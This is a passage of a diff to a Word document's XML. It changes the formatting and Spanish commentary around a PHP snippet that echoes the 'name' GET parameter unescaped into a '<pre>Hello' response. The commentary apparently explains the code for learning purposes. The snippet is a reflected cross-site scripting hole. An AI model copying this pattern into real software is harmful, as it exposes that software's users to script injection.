+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+        </w:rPr>
+        <w:t>if( array</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+        </w:rPr>
+        <w:t>_key_exists( "name", $_GET ) &amp;&amp; $_GET[ 'name' ] != </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+        </w:rPr>
+        <w:t>NULL )</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CdigoHTML"/>
+          <w:rFonts w:ascii="Arial" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+        </w:rPr>
+        <w:t> {</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CdigoHTML"/>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>if( </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="0000BB"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>array_key_exists</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>( </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="DD0000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>"name"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="0000BB"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>$_GET </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>) &amp;&amp; </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="0000BB"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>$_GET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>[ </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="DD0000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'name' </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>] != </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="0000BB"/>
-        </w:rPr>
-        <w:t>NULL </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Prrafodelista"/>
-          <w:color w:val="007700"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-        </w:rPr>
-        <w:t> {</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
@@ -1367,148 +1625,639 @@
           <w:lang w:eastAsia="es-ES"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t xml:space="preserve"> verifica si existe un parámetro “name” en la solicitud HTTP GET junto a que no sea un valor nulo.</w:t>
+        <w:t xml:space="preserve"> verifica si existe </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>el</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> parámetro “name” en la solicitud HTTP GET junto a que no sea un valor nulo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> como condición para pasar a la siguiente línea de código.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">echo '&lt;pre&gt;Hello </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>' .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>$_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>GET[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 'name' ] . </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'&lt;/pre&gt;';</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="FFC000" w:themeColor="accent4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:textOutline w14:w="0" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
+            <w14:noFill/>
+            <w14:prstDash w14:val="solid"/>
+            <w14:round/>
+          </w14:textOutline>
+          <w14:props3d w14:extrusionH="57150" w14:contourW="0" w14:prstMaterial="softEdge">
+            <w14:bevelT w14:w="25400" w14:h="38100" w14:prst="circle"/>
+          </w14:props3d>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>si</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> se cumplen las condiciones anteriores, se mostrar</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>á</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> en código HTML, dentro de una etiqueta </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>“&lt;pre&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>”,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> la</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cadena de texto </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>“Hello</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>”, seguida del valor del parámetro “name”</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rStyle w:val="CdigoHTML"/>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
-          <w:color w:val="007700"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El resultado final </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>será</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> una respuesta HTTP que contiene un mensaje de bienvenida personalizado con el nombre del usuario, rodeado por etiquetas </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&lt;pre&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> para que se muestre de manera legible.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">El array </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>$_GET</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> es una variable superglobal en PHP que contiene todos los parámetros pasados a la solicitud actual a través de la cadena de consulta (query </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>string</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="es-ES"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>) de la URL.</w:t>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
